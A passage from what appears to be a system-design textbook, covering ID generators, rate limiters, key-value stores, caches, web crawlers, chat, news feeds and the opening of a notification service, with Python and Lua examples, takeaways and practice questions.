| Ticket server | Every batch | Yes | 64-bit | Central dependency |
| Snowflake | Worker ID only | Yes | 64-bit | Clock dependency |
Snowflake is the canonical answer because it buys time-sortability without per-ID coordination. A 64-bit integer is partitioned into a timestamp, a worker identifier, and a per-millisecond sequence counter. Uniqueness follows structurally: two IDs differ in time, or in worker, or in sequence.
SNOWFLAKE 64-BIT LAYOUT
0 | 41 bits timestamp (ms since epoch) | 10 bits worker | 12 bits sequence
^ ~69 years of range 1024 workers 4096 ids/ms/worker
|
sign bit kept 0 so the value stays positive in signed 64-bit types
Capacity: 4096 x 1024 = 4.2M IDs per millisecond fleet-wide.
Sortability: the timestamp occupies the HIGH bits, so integer ordering is
time ordering across the whole fleet (to millisecond granularity).
import time, threading
class Snowflake:
EPOCH_MS = 1_700_000_000_000 # custom epoch: buys back years of range
WORKER_BITS, SEQ_BITS = 10, 12
MAX_WORKER = (1 << WORKER_BITS) - 1
MAX_SEQ = (1 << SEQ_BITS) - 1
def __init__(self, worker_id: int):
assert 0 <= worker_id <= self.MAX_WORKER
self.worker_id = worker_id
self.last_ms = -1
self.seq = 0
self.lock = threading.Lock()
def _now(self) -> int:
return int(time.time() * 1000)
def next_id(self) -> int:
with self.lock:
ts = self._now()
if ts < self.last_ms:
# CLOCK WENT BACKWARDS (NTP correction). Never emit an ID that
# could duplicate one already issued: refuse until time catches up.
raise RuntimeError(f"clock moved back {self.last_ms - ts} ms")
if ts == self.last_ms:
self.seq = (self.seq + 1) & self.MAX_SEQ
if self.seq == 0: # 4096 IDs used this ms
while (ts := self._now()) <= self.last_ms:
pass # spin to the next millisecond
else:
self.seq = 0
self.last_ms = ts
return (((ts - self.EPOCH_MS) << (self.WORKER_BITS + self.SEQ_BITS))
| (self.worker_id << self.SEQ_BITS)
| self.seq)
gen = Snowflake(worker_id=7)
ids = [gen.next_id() for _ in range(3)]
print(ids, ids == sorted(ids)) # monotonically increasing
The two operational hazards are both about the assumptions the layout encodes. Worker ID assignment must guarantee no two live processes share an ID — take it from ZooKeeper/etcd leases, a Kubernetes StatefulSet ordinal, or a configuration service, never from a hash of the hostname or a random number. Clock skew breaks the uniqueness argument: if the clock jumps backwards, IDs can repeat, so the generator must refuse to issue during the regression rather than risk a duplicate, and the fleet should run NTP with slew rather than step corrections.
Where 128 bits are acceptable, UUIDv7 is now the pragmatic default: it embeds a millisecond timestamp in the high bits, so it sorts like Snowflake and indexes well, while needing no worker-ID coordination at all. Choose 64-bit Snowflake when index size and storage matter (billions of rows, IDs repeated as foreign keys); choose UUIDv7 when you want zero coordination and can afford the extra eight bytes.
Key Takeaways
- Centralized auto-increment gives ordering but caps write throughput and adds a single point of failure.
- Snowflake partitions 64 bits into time, worker, and sequence — uniqueness is structural and requires no coordination per ID.
- Putting the timestamp in the high bits is what makes IDs time-sortable, which is worth far more than it sounds for indexes and pagination.
- Worker IDs must come from a coordination service or stable ordinal, never a hash or a random draw.
- Backwards clock movement must block issuance; use NTP slewing.
- UUIDv7 gives sortability with zero coordination at 128 bits — the default unless index size dominates.
🧪 Practice
- Compute the maximum IDs per second for a 10-bit worker, 12-bit sequence layout, and re-partition the bits for 4096 workers.
- Implement worker-ID assignment using leases, including what happens when a lease expires while the process is still running.
- Interview: Your ID generator emitted a duplicate. List the possible causes. (Hint: uniqueness rests on three assumptions in the layout — enumerate what breaks each one.)
Design a Rate Limiter
Any service exposed to the world will eventually be hit harder than it can serve — by an abusive client, a buggy retry loop, or a legitimate customer's traffic spike. A rate limiter enforces a quota so that the system degrades predictably for the offender instead of unpredictably for everyone. It is a protection mechanism first (9.x) and a monetization mechanism second.
Requirements. Limit requests per identity (API key, user, IP) per window;
respond with 429 Too Many Requests plus headers telling the client its limit,
remaining quota, and when to retry; work correctly across many application
instances; and — crucially — add almost nothing to request latency, since it runs
on every single request.
Algorithms. The choice is a trade between memory, burst behaviour, and boundary accuracy.
FIXED WINDOW SLIDING WINDOW LOG
[--- 60s ---][--- 60s ---] keep a timestamp per request; count those
99 reqs at 0:59 within the last 60s. Exact, but O(requests)
99 reqs at 1:00 -> 198 in 2s! memory per identity.
Cheap; boundary burst = 2x limit.
TOKEN BUCKET SLIDING WINDOW COUNTER
capacity 100, refill 10/s weighted blend of previous and current
+---------+ fixed windows:
| ****** | <- refill count = prev * overlap + curr
+----+----+ approximates the log with O(1) memory,
| take 1 per request smoothing the boundary burst.
v empty -> reject
Allows bursts up to capacity,
then settles to the steady rate.
Token bucket is the usual production answer: it is O(1) in memory per identity, permits short bursts (which real clients need), and enforces an average rate. It is also what most gateways and cloud providers implement, so its semantics are familiar to clients.
import time
REFILL_LUA = """
-- Atomic token bucket in Redis. Atomicity matters: a read-modify-write from
-- the application would race across instances and let the limit be exceeded.
local key = KEYS[1]
local rate = tonumber(ARGV[1]) -- tokens per second
local capacity = tonumber(ARGV[2])
local now = tonumber(ARGV[3])
local cost = tonumber(ARGV[4])
local b = redis.call('HMGET', key, 'tokens', 'ts')
local tokens = tonumber(b[1]) or capacity
local ts = tonumber(b[2]) or now
tokens = math.min(capacity, tokens + (now - ts) * rate) -- lazy refill
local allowed = tokens >= cost
if allowed then tokens = tokens - cost end
redis.call('HMSET', key, 'tokens', tokens, 'ts', now)
redis.call('EXPIRE', key, math.ceil(capacity / rate) * 2) -- reclaim idle keys
return { allowed and 1 or 0, tokens }
"""
class LocalTokenBucket:
"""Per-instance bucket used as a fast path in front of the shared limiter."""
def __init__(self, rate: float, capacity: float):
self.rate, self.capacity = rate, capacity
self.tokens, self.ts = capacity, time.monotonic()
def allow(self, cost: float = 1.0) -> tuple[bool, float]:
now = time.monotonic()
# Refill lazily: no background timer, cost is O(1) per request.
self.tokens = min(self.capacity, self.tokens + (now - self.ts) * self.rate)
self.ts = now
if self.tokens >= cost:
self.tokens -= cost
return True, self.tokens
retry_after = (cost - self.tokens) / self.rate
return False, retry_after
b = LocalTokenBucket(rate=10, capacity=20) # 10/s sustained, burst of 20
print([b.allow()[0] for _ in range(22)][-3:]) # [True, False, False]
Distributed enforcement is the hard part. A limit of 1000/minute across 50 instances cannot be enforced by each instance allowing 20/minute — traffic is not evenly balanced, so that both over- and under-limits real clients. The two viable designs are a shared store (Redis with an atomic script, as above: exact, but one network round trip per request) or local buckets that periodically sync their consumption to a central store (approximate, but nearly free per request). A common hybrid uses a local bucket sized to a fraction of the quota as a fast path and consults the shared store only when the local budget is exhausted.
Placement matters as much as the algorithm. Limiting at the API gateway or edge stops abusive traffic before it consumes application capacity, which is the whole point; limiting only inside the service means the attack still costs you connection handling, TLS, and authentication. Most systems run both — coarse limits at the edge, fine-grained per-endpoint limits in the service — and always return the standard headers so well-behaved clients can self-regulate.
429 response headers (let clients cooperate rather than guess)
RateLimit-Limit: 1000
RateLimit-Remaining: 0
RateLimit-Reset: 42 <- seconds until quota refreshes
Retry-After: 42 <- clients must honour this, with jitter (13.3)
Key Takeaways
- Rate limiting protects capacity: the goal is predictable degradation for the offender, not fairness in the abstract.
- Token bucket is the practical default — O(1) memory, allows bursts, enforces an average rate.
- Fixed windows permit a 2x burst at the boundary; sliding window counters fix it cheaply, logs fix it exactly at higher memory cost.
- Distributed limits need atomic operations in a shared store, or local buckets with periodic sync; per-instance division of the quota is wrong.
- Enforce at the edge to reject before spending capacity, and again per endpoint for granularity.
- Always return limit, remaining, reset, and
Retry-Afterheaders.
🧪 Practice
- Trace token bucket state through a burst of 30 requests at capacity 20 and refill 10/s, listing which are rejected and when they would succeed.
- Design tiered limits (free/pro/enterprise) including how a key's tier change takes effect without restarting instances.
- Interview: Your limiter's Redis becomes unavailable. What should happen? (Hint: think about which failure mode is worse for your service — letting everything through, or rejecting everything — and whether a local fallback can bound the damage.)
Design a Key-Value Store
Building a distributed key-value store is the exercise that forces every
distributed-systems concept into one place: partitioning, replication,
consistency, failure detection, and repair. The interface is deliberately tiny —
get(key), put(key, value), delete(key) — so all the difficulty is in making
those three operations work across hundreds of machines that fail independently.
Requirements. Store values by key with configurable durability; scale horizontally by adding nodes; survive node and rack failure; offer tunable consistency, because different callers legitimately want different points on the consistency/latency curve (3.x, CAP).
Partitioning. Naive hash(key) % N redistributes nearly every key when N
changes. Consistent hashing places nodes and keys on a ring so that adding or
removing a node moves only the keys between it and its neighbour; virtual
nodes (many ring positions per physical node) smooth the load imbalance that a
few random positions would otherwise produce.
import hashlib, bisect
class ConsistentHashRing:
def __init__(self, nodes: list[str], vnodes: int = 150):
self.vnodes = vnodes
self.ring: dict[int, str] = {}
self.sorted_keys: list[int] = []
for n in nodes:
self.add(n)
def _hash(self, s: str) -> int:
return int(hashlib.md5(s.encode()).hexdigest(), 16)
def add(self, node: str) -> None:
for i in range(self.vnodes): # many positions => even spread
h = self._hash(f"{node}#{i}")
self.ring[h] = node
bisect.insort(self.sorted_keys, h)
def remove(self, node: str) -> None:
for i in range(self.vnodes):
h = self._hash(f"{node}#{i}")
del self.ring[h]
self.sorted_keys.remove(h)
def preference_list(self, key: str, n: int) -> list[str]:
"""The N distinct physical nodes that replicate this key: walk
clockwise, skipping vnodes that map to a node already chosen."""
h = self._hash(key)
i = bisect.bisect(self.sorted_keys, h) % len(self.sorted_keys)
out: list[str] = []
for step in range(len(self.sorted_keys)):
node = self.ring[self.sorted_keys[(i + step) % len(self.sorted_keys)]]
if node not in out:
out.append(node)
if len(out) == n:
break
return out
ring = ConsistentHashRing(["n1", "n2", "n3", "n4"])
print(ring.preference_list("user:42", n=3)) # e.g. ['n3', 'n1', 'n4']
moved = sum(ring.preference_list(f"k{i}", 1) != None for i in range(0)) # noop
ring.add("n5")
print(ring.preference_list("user:42", n=3)) # most keys keep their home
Replication and consistency. Each key is stored on the first N nodes of its
preference list. Quorum parameters let callers choose their guarantee per
operation: with N replicas, requiring W acknowledgements on write and R responses
on read, R + W > N guarantees the read set intersects the write set and
therefore sees the latest committed value.
QUORUM CONFIGURATIONS (N = 3)
W=3, R=1 fast reads, slow writes, no write availability if any replica is down
W=1, R=3 fast writes, slow reads
W=2, R=2 balanced; tolerates one node down for both reads and writes <- default
W=1, R=1 fastest, eventually consistent (R + W <= N: reads may be stale)
write to A,B (W=2) read from B,C (R=2)
A[v2] B[v2] C[v1] the overlap at B guarantees v2 is seen;
\____/ \____/ C's stale v1 is repaired in the background
write read (read repair) or by anti-entropy.
Conflict resolution is unavoidable once concurrent writes are allowed. Last write wins using timestamps is simple and lossy — a clock skew silently discards a write. Vector clocks capture causality instead: they can tell whether one version descends from another (safe to overwrite) or whether the two are concurrent (a genuine conflict the application must resolve, as Dynamo's shopping cart does by merging).
Locally, each node needs a storage engine. LSM trees (memtable plus sorted files, background compaction) suit write-heavy workloads and are what Cassandra and RocksDB use; B-trees suit read-heavy workloads with in-place updates. Add failure detection by gossip, hinted handoff so writes for a temporarily unavailable replica are buffered by a peer, and Merkle trees so replicas can compare and repair divergent ranges without shipping all their data.
Key Takeaways
- Consistent hashing with virtual nodes keeps rebalancing proportional to the change, not to the dataset.
R + W > Nguarantees read-your-writes; the specific split trades read latency against write latency and availability.- Timestamp-based last-write-wins silently loses data under clock skew; vector clocks distinguish causality from true concurrency.
- Anti-entropy (Merkle trees) plus read repair and hinted handoff are what keep replicas converging.
- LSM for write-heavy, B-tree for read-heavy local storage.
- The API is trivial; all the engineering is in partitioning, replication, and repair.
🧪 Practice
- Compute the fraction of keys that move when adding one node to a 10-node ring, with and without virtual nodes.
- For N=5, list every (W, R) pair that guarantees strong consistency, and rank them by write availability.
- Interview: Two clients write different values to the same key at the same moment. What does your store return on the next read? (Hint: the honest answers differ by conflict-resolution strategy — say which one you chose and what the application must then do.)
Design a Distributed Cache
A cache trades memory for latency and load: it keeps a small hot subset of data close to the application so the expensive backing store is consulted rarely. The distributed version adds the question of where a given key lives across a fleet of cache nodes, and — the part that bites in production — what happens when a node joins, leaves, or fails while traffic is flowing.
Requirements. Sub-millisecond get/set at very high throughput; horizontal
scale by adding nodes; graceful behaviour on node loss (a cache miss, not an
error); memory bounded by eviction; and optional replication for hot keys. A
cache is by definition allowed to lose data — the design must never treat it as
the source of truth.
Topology and placement. Client-side consistent hashing (the memcached model) keeps the cache tier dumb and stateless, with routing knowledge in a client library; a proxy or cluster-aware server (the Redis Cluster model) centralizes routing at a small latency cost. Either way, consistent hashing (previous topic) is what makes node membership changes cheap.
Caching patterns determine consistency behaviour more than any other choice:
| Pattern | Read path | Write path | Note |
|---|---|---|---|
| Cache-aside | Miss -> load DB -> populate | Write DB, invalidate cache | Most common; app owns logic |
| Read-through | Cache loads from DB itself | — | Uniform, needs cache support |
| Write-through | — | Write cache and DB together | Consistent, slower writes |
| Write-behind | — | Write cache, flush DB async | Fast, can lose data on crash |
| Refresh-ahead | Refresh before TTL expiry | — | Hides latency for hot keys |
import time, random, threading
class CacheAside:
"""Cache-aside with the three defences every production cache needs."""
def __init__(self, cache, db, ttl: int = 300):
self.cache, self.db, self.ttl = cache, db, ttl
self.locks: dict[str, threading.Lock] = {}
def get(self, key: str):
hit = self.cache.get(key)
if hit is not None:
if hit == "__MISS__": # NEGATIVE CACHING stops repeated
return None # lookups for keys that don't exist
return hit
# STAMPEDE PROTECTION: on a miss for a hot key, thousands of requests
# would hit the DB simultaneously. One loader wins; the rest wait.
lock = self.locks.setdefault(key, threading.Lock())
with lock:
hit = self.cache.get(key) # re-check: another thread may have
if hit is not None: # populated it while we waited
return None if hit == "__MISS__" else hit
value = self.db.get(key)
# JITTERED TTL: identical TTLs make whole cohorts of keys expire in
# the same second, producing a synchronised stampede later.
ttl = int(self.ttl * random.uniform(0.9, 1.1))
self.cache.set(key, value if value is not None else "__MISS__", ttl)
return value
def update(self, key: str, value) -> None:
self.db.put(key, value)
# Invalidate rather than update: writing the new value into the cache
# races with concurrent readers repopulating it with the OLD value.
self.cache.delete(key)
Eviction decides what the cache keeps once memory is full. LRU is the default and is right for recency-dominated access; LFU handles workloads where a few keys are persistently hot and a scan would otherwise evict them; TTL alone is appropriate when staleness, not memory, is the binding constraint. Modern engines use approximations (sampled LRU, TinyLFU) because exact ordering costs more than it returns.
Three failure behaviours deserve explicit design. Thundering herd on a popular key is handled by the single-flight lock above, or by serving stale data while one request refreshes. Cold cache after a restart can overwhelm the database — mitigate by warming the cache from a snapshot or by rolling restarts that never take out the whole tier at once. And hot keys overwhelm the single node that owns them; the standard fix is to replicate that key across several nodes and have clients pick randomly, or to keep a small local in-process cache in front of the shared tier.
CACHE TIERS
app process
[ L1: in-process LRU, ~1000 keys, TTL seconds ] <- absorbs hot keys, no
| miss network hop at all
v
[ L2: shared cache cluster, consistent hashing ] <- the main tier, ~99% hits
| miss
v
[ database ] <- must be sized to survive the miss rate, not the hit rate
Key Takeaways
- A cache is never the source of truth: losing a node must produce misses, not errors.
- Consistent hashing bounds the disruption of membership changes.
- Cache-aside with invalidation-on-write is the default; updating the cache on write races with concurrent readers.
- Defend against stampedes with single-flight loading, jittered TTLs, and negative caching.
- Choose eviction by access pattern: LRU for recency, LFU for persistent hotness, TTL for staleness limits.
- Size the database for the miss rate, and add an in-process L1 for hot keys.
🧪 Practice
- Compute the database load produced by a 95% hit rate at 200k requests/sec, then at 90%, and note what that means for capacity planning.
- Implement single-flight loading and show how many database calls occur when 500 concurrent requests miss the same key.
- Interview: After a cache cluster restart the database falls over. Why, and how do you prevent it? (Hint: think about what fraction of traffic the database was previously never seeing, and what a staged restart changes.)
Design a Web Crawler
A crawler discovers and downloads pages so a downstream system — a search index (14.3.1), an archive, a price monitor — can process them. The naive version is a breadth-first traversal, which is ten lines of code and immediately wrong at scale: it hammers individual hosts, re-fetches the same content endlessly, gets trapped by infinite URL spaces, and ignores the rules sites publish about automated access.
Requirements. Crawl billions of pages with bounded politeness per host,
respect robots.txt, avoid duplicate fetches and duplicate content, prioritize
important and frequently-changing pages, and recrawl at a rate matched to how
often each page actually changes. Non-functional: horizontally scalable, robust
to malformed responses, and restartable — a crawl that must begin again after a
crash is unusable.
Estimates. One billion pages per month is ~385 pages/second sustained; at 100 KB per page that is ~100 TB of raw content per month, and the URL frontier itself will hold billions of entries, which is far too large for memory and must be a disk-backed queue.
CRAWLER ARCHITECTURE
seed URLs
|
v
[ URL FRONTIER ] two-level queue:
front queues = PRIORITY (importance, freshness need)
back queues = POLITENESS (one queue per host; a worker holds a host lease
and waits the host's crawl delay between fetches)
|
v
[ fetcher pool ] --robots.txt cache--> obey Disallow + Crawl-delay
| (DNS cache: DNS is a real bottleneck at this rate)
v
[ content processing ]
|-- checksum / SimHash -> duplicate content detection
|-- extract links -> normalize -> seen-URL filter (Bloom) -> frontier
|-- store raw page -> object storage; metadata -> KV store
v
[ index / downstream consumer ]
The frontier is the heart of the design. Its two levels solve two different problems: front queues decide what to crawl next by priority, back queues ensure that no host receives concurrent or rapid-fire requests regardless of how many of its URLs are pending. Without the back-queue layer, a site with a million links gets crawled as a denial-of-service attack.
import time, heapq, hashlib
from collections import defaultdict, deque
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode
def normalize(url: str) -> str:
"""Canonicalize aggressively: the same page reached by different URLs must
produce the same key, or the crawler re-fetches it forever."""
p = urlsplit(url.strip())
scheme = p.scheme.lower() or "https"
host = p.hostname.lower() if p.hostname else ""
if host.startswith("www."):
host = host[4:]
port = "" if p.port in (None, 80, 443) else f":{p.port}"
path = (p.path or "/").rstrip("/") or "/"
# Drop tracking parameters and sort the rest: ?b=2&a=1 == ?a=1&b=2
drop = {"utm_source", "utm_medium", "utm_campaign", "gclid", "fbclid"}
q = urlencode(sorted((k, v) for k, v in parse_qsl(p.query) if k not in drop))
return urlunsplit((scheme, host + port, path, q, "")) # fragment removed
class Frontier:
def __init__(self, default_delay: float = 1.0):
self.front: list[tuple[float, str]] = [] # (-priority, url)
self.back: dict[str, deque] = defaultdict(deque) # host -> urls
self.next_ok: dict[str, float] = {} # host -> earliest fetch
self.delay = default_delay
def add(self, url: str, priority: float = 0.5) -> None:
heapq.heappush(self.front, (-priority, normalize(url)))
def _drain(self) -> None:
while self.front:
_, url = heapq.heappop(self.front)
self.back[urlsplit(url).hostname].append(url) # route by host
def next_url(self) -> str | None:
self._drain()
now = time.monotonic()
for host, q in self.back.items():
if q and now >= self.next_ok.get(host, 0.0):
self.next_ok[host] = now + self.delay # politeness enforced here
return q.popleft()
return None # everything is cooling down
def simhash(text: str, bits: int = 64) -> int:
"""Near-duplicate detection: pages differing only in a timestamp or an ad
should collapse to the same fingerprint, which an exact checksum cannot do."""
v = [0] * bits
for token in text.split():
h = int(hashlib.md5(token.encode()).hexdigest(), 16)
for i in range(bits):
v[i] += 1 if (h >> i) & 1 else -1
return sum(1 << i for i in range(bits) if v[i] > 0)
def hamming(a: int, b: int) -> int:
return bin(a ^ b).count("1") # distance <= 3 => near-duplicate
print(normalize("HTTPS://WWW.Example.com/a/?utm_source=x&b=2&a=1#frag"))
# https://example.com/a?a=1&b=2
Deduplication happens twice. URL-level: a Bloom filter (or a sharded set) answers "have I already queued this?" in constant memory with a tunable false positive rate — acceptable because a false positive merely skips a page. Content-level: exact checksums catch identical pages, while SimHash or MinHash catch near-duplicates, which are extremely common (session IDs in URLs, printer views, syndicated articles).
Traps and politeness round out the design. Infinite spaces — calendars with
"next month" links forever, faceted-search parameter explosions — need depth
limits, per-host page caps, and pattern detection. robots.txt must be fetched,
cached with a TTL, and honoured including Crawl-delay; a User-Agent should
identify the crawler with a contact URL. Recrawl scheduling should be
adaptive: estimate each page's change rate from its observed history and schedule
proportionally, so news pages are revisited hourly and static pages monthly,
rather than sweeping everything on one fixed cycle.
Key Takeaways
- The URL frontier is the core: front queues for priority, back queues for per-host politeness.
- Normalize URLs aggressively — canonicalization failures cause endless re-fetching of the same content.
- Deduplicate at both URL level (Bloom filter) and content level (checksum plus SimHash for near-duplicates).
- Respect
robots.txtand crawl delays, and identify your crawler; politeness is a design requirement, not etiquette.- Defend against infinite URL spaces with depth limits and per-host caps.
- Schedule recrawls from observed change rates, not on a uniform cycle.
- Cache DNS: at hundreds of fetches per second it becomes a bottleneck.
🧪 Practice
- Size a Bloom filter for 5 billion URLs at a 1% false positive rate, and state what a false positive costs you.
- Write normalization rules that collapse at least five different URL forms of one page into a single key.
- Interview: Your crawler keeps re-downloading the same content under different URLs. Diagnose it. (Hint: consider both what your normalizer is not stripping and what the site itself is generating.)
<a id="152-communication-and-social-systems"></a>
15.2 Communication and Social Systems
Social systems share one structural problem: a single write by one user must reach an unpredictable number of readers, and the ratio between those two numbers decides the entire architecture. This subchapter works through chat, feeds, notifications, the social graph itself, and comment threads — five systems whose designs are mostly answers to the question of when to do the fan-out work.
Design a Chat Application
Messaging looks like a CRUD problem and is actually a connection-management problem. Requests do not initiate the interesting events: messages arrive from other people, so the server must push to clients that are connected right now, queue for clients that are not, and reconcile the two without losing or duplicating anything. Everything else follows from that.
Requirements. One-to-one and group messaging; delivery and read receipts; presence (online/last seen); message history with pagination; push notification when the recipient is offline; ordering that is consistent for all participants of a conversation. Non-functional: p99 delivery under ~200 ms for connected users, no message loss once accepted, and support for tens of millions of concurrent connections.
Estimates. 50M daily active users, 40 messages each = 2B messages/day (~23k/s average, ~70k/s peak). At 1 KB per message that is 2 TB/day of message data. Ten million concurrent WebSocket connections at ~10 KB of kernel and application state each is ~100 GB of memory across the connection tier — roughly 100 servers holding 100k connections apiece, which is what makes the connection tier a distinct service.
CHAT ARCHITECTURE
client --WebSocket--> [ gateway / connection tier ] stateful: holds the socket
| ^ 100k conns per node
| | push
v |
[ session registry ] user -> gateway node (Redis, TTL)
|
v
send ----------------> [ chat service ] --+--> message store (append-only,
| partitioned by conversation)
+--> outbox/queue -> fan-out to
| recipients' gateway nodes
+--> push service (APNs/FCM) if the
recipient has no live session
The gateway is the ONLY stateful tier. Everything behind it is stateless and
scales normally; the registry is what lets a stateless service find a socket.
Message flow. The client sends over its existing socket with a client-generated ID; the chat service persists the message first, then acknowledges the sender, then fans out. Persisting before acknowledging is what makes "accepted" mean "durable" — the reverse order loses messages on a crash between the two.
import time, uuid
class ChatService:
def send(self, sender: str, conversation_id: str, body: str,
client_msg_id: str) -> dict:
# IDEMPOTENCY: the client retries on network failure using the SAME
# client_msg_id, so a duplicate send must return the original result.
existing = self.store.find_by_client_id(conversation_id, client_msg_id)
if existing:
return existing
msg = {
"message_id": self.ids.next_id(), # Snowflake: time-sortable
"conversation_id": conversation_id,
"sender": sender,
"body": body,
"seq": self.store.next_seq(conversation_id), # per-conversation order
"created_at": time.time(),
"client_msg_id": client_msg_id,
}
self.store.append(msg) # 1. DURABLE first
self.outbox.publish(msg) # 2. then fan out asynchronously
return msg # 3. ack the sender
def deliver(self, msg: dict) -> None:
for recipient in self.members(msg["conversation_id"]):
if recipient == msg["sender"]:
continue
node = self.registry.get(recipient) # which gateway holds them?
if node:
self.gateway_rpc(node).push(recipient, msg)
else:
# Offline: the message is already durable; queue a push
# notification and let the client sync on reconnect.
self.push.notify(recipient, msg)
Ordering and sync. Global ordering across all conversations is unnecessary and
expensive; ordering within a conversation is what users perceive. A
monotonically increasing per-conversation sequence number gives that cheaply and
also gives clients a resumption cursor: on reconnect a client sends its last seen
seq per conversation and receives everything after it, which handles missed
messages, reordering, and duplicates in one mechanism. Client-side ordering
should use the server sequence, never the device clock.
Storage. Messages are an append-heavy, range-read workload partitioned by conversation ID and clustered by sequence — exactly the shape a wide-column store (Cassandra, HBase) or a partitioned relational table serves well. Group conversations should store one copy of the message plus per-user read state, rather than a copy per recipient; the "copy per recipient" model only pays off when per-user mutation of the message is needed.
The hard sub-problems worth naming: presence at scale is a firehose (a user with 500 contacts going online produces 500 notifications, so batch and rate-limit it, and accept a few seconds of staleness); read receipts are per-user, per-conversation high-write-rate state that should be a single "last read seq" value rather than a row per message; and end-to-end encryption changes the design fundamentally, because the server can no longer read message content — search must happen client-side, and group key distribution becomes its own protocol.
Key Takeaways
- Chat is a connection-management problem: a stateful gateway tier plus a session registry that maps users to gateway nodes.
- Persist before acknowledging, then fan out asynchronously.
- Per-conversation sequence numbers give both perceived ordering and a reconnect cursor; global ordering is unnecessary.
- Client-supplied message IDs make retries idempotent and de-duplicate at the source.
- Store one message copy per conversation plus per-user read state, not a copy per recipient.
- Presence is a fan-out firehose — batch it and tolerate staleness.
- End-to-end encryption removes the server's ability to search or moderate.
🧪 Practice
- Size the connection tier for 20M concurrent users at 100k connections per node, including the memory and the failover implications when one node dies.
- Design the reconnect-and-sync protocol, specifying exactly what the client sends and what the server returns.
- Interview: A user's messages sometimes appear out of order on one device. What causes this and how do you fix it? (Hint: think about what the client is sorting by, and which of the available timestamps or counters is authoritative.)
Design a News Feed System
A feed shows a user recent activity from the accounts they follow, ranked and paginated. The entire design reduces to one question with no universally correct answer: do you compute a user's feed when the content is written (fan-out on write) or when the feed is read (fan-out on read)? Every real system answers "both, depending on the author".
Requirements. Post an item; retrieve a ranked feed with stable pagination; see new posts within seconds; support follower counts ranging from 10 to 100 million. Non-functional: feed reads must be fast (p99 ~200 ms) and are enormously more frequent than writes.
Estimates. 300M daily active users checking the feed 10 times a day is 3B reads/day (~35k/s average, 100k/s peak). 50M posts/day is ~600/s. With an average of 200 followers, fan-out on write means 50M x 200 = 10B feed-entry writes per day (~115k/s) — expensive but tractable, until a celebrity with 100M followers posts and produces 100M writes from a single action.
THE TWO STRATEGIES
FAN-OUT ON WRITE (push) FAN-OUT ON READ (pull)
post -> for each follower: post -> author's timeline only
append to their feed list read -> for each followed account:
read -> one lookup. FAST. fetch recent, merge, rank
write -> O(followers). EXPENSIVE. read -> O(following). SLOW.
Celebrity post = 100M writes. write -> O(1). CHEAP.
HYBRID (what production systems do)
- normal authors -> push into follower feeds at write time
- celebrity authors -> not pushed; pulled at read time and merged
- inactive users -> not pushed at all; their feed is built on next login
read path: precomputed_feed MERGE celebrity_recent -> rank -> page
CELEBRITY_THRESHOLD = 100_000
class FeedService:
def on_post(self, author_id: str, post: dict) -> None:
self.posts.put(post["id"], post)
self.author_timeline.prepend(author_id, post["id"])
followers = self.graph.follower_count(author_id)
if followers >= CELEBRITY_THRESHOLD:
return # do NOT fan out: 100M writes for one action.
# These posts are merged in at read time instead.
for batch in self.graph.followers_batched(author_id, size=1000):
active = self.activity.filter_recently_active(batch, days=30)
# Skipping dormant users typically removes 60-80% of the fan-out
# cost; their feed is rebuilt lazily when they next log in.
self.feed_store.multi_prepend(active, post["id"], cap=800)
def get_feed(self, user_id: str, cursor: str | None, limit: int = 20):
precomputed = self.feed_store.range(user_id, cursor, limit * 3)
celebs = self.graph.celebrities_followed(user_id) # usually few
pulled = [pid for c in celebs
for pid in self.author_timeline.recent(c, limit)]
ids = self._dedupe(precomputed + pulled)
posts = self.posts.multi_get(ids) # batch fetch
ranked = self.ranker.score(user_id, posts) # 14.3.3 funnel
page = ranked[:limit]
# Cursor is (score, post_id), NOT an offset: offsets shift as new posts
# arrive and cause users to see duplicates or skip items.
next_cursor = f"{page[-1]['score']}:{page[-1]['id']}" if page else None
return page, next_cursor
Ranking turns a chronological merge into a feed. It is the funnel from 14.3.3 in miniature: candidate generation (the merged set above, plus recommended content from accounts the user does not follow), scoring by a model over engagement and affinity features, then re-ranking for diversity and freshness so one prolific author cannot occupy the whole page.
Storage. Feeds are lists of post IDs, capped (nobody scrolls past a few hundred items) and held in a fast store — a Redis list or sorted set per user is the classic implementation, with the authoritative post content in a separate partitioned store. Storing IDs rather than content is what makes edits and deletions tractable: one write updates the post everywhere it appears.
Trade-offs to state. Fan-out on write burns storage and write throughput to buy read latency; fan-out on read does the reverse; the hybrid buys both at the cost of a more complex read path and a threshold that must be tuned. Deletion is asymmetric — with push, a deleted post lingers in millions of precomputed feeds, so the read path must filter against a tombstone rather than assume the feed entries are valid.
Key Takeaways
- Feed design is a choice about when fan-out happens; the hybrid is the production answer.
- Fan-out on write gives O(1) reads and O(followers) writes; celebrities break it, so exclude them and pull at read time.
- Skip fan-out to dormant users and rebuild their feed lazily — usually the single largest cost saving.
- Store post IDs in feeds, not content, so edits and deletes are one write.
- Cap feed length; nobody reads past a few hundred entries.
- Paginate by an opaque (score, id) cursor, never by offset.
- Ranking is the recommendation funnel: generate, score, then diversify.
🧪 Practice
- Compute daily feed writes for 50M posts/day at an average of 300 followers, then recompute excluding accounts inactive for 30 days.
- Design the read path for a user who follows 20 celebrities and 400 normal accounts, naming every store touched.
- Interview: A user with 80M followers posts. Walk through what happens. (Hint: the answer is mostly about what does not happen at write time, and where the cost reappears instead.)
Design a Notification Service
Notifications are the system every other system depends on and nobody owns properly. The core requirement is deceptively simple — deliver a message to a user through email, SMS, push, or in-app — and the difficulty is entirely in the surrounding concerns: third-party providers that fail, user preferences that must be honoured, deduplication, rate limiting so people are not spammed, and the fact that sending is not idempotent from the recipient's point of view.
Requirements. Accept notification requests from many internal services; resolve the user's channel preferences and locale; render from templates; deliver via provider integrations with retries; track delivery status; enforce quiet hours, frequency caps, and unsubscribes; support both transactional (must arrive: password reset, payment receipt) and promotional (best-effort) traffic.
Estimates. 10M notifications/day is ~115/s average with sharp peaks — a marketing campaign to 5M users, or an incident alert, arrives as a burst orders of magnitude above average. That burst profile is why the design is queue-first: the API must accept work quickly and let workers drain at the rate providers allow.
NOTIFICATION PIPELINE
producer services
| POST /notifications {user, event_type, payload, dedupe_key}
v
[ API: validate, dedupe, enqueue ] <- returns immediately (202 Accepted)
|
v
[ preference & eligibility filter ] <- channel opt-ins, quiet hours,
| frequency caps, unsubscribes,
| LEGAL: transactional bypasses
v promotional suppression
[ template render (locale, i18n) ]
|
v
[ per-channel queues: push | email | sms | in-app ] <- separate queues so a
| | | | slow provider cannot
v v v v block another channel
[ provider adapters: FCM/APNs, SES, Twilio ] -- circuit breakers (9.2),
| rate limits, failover provider
v
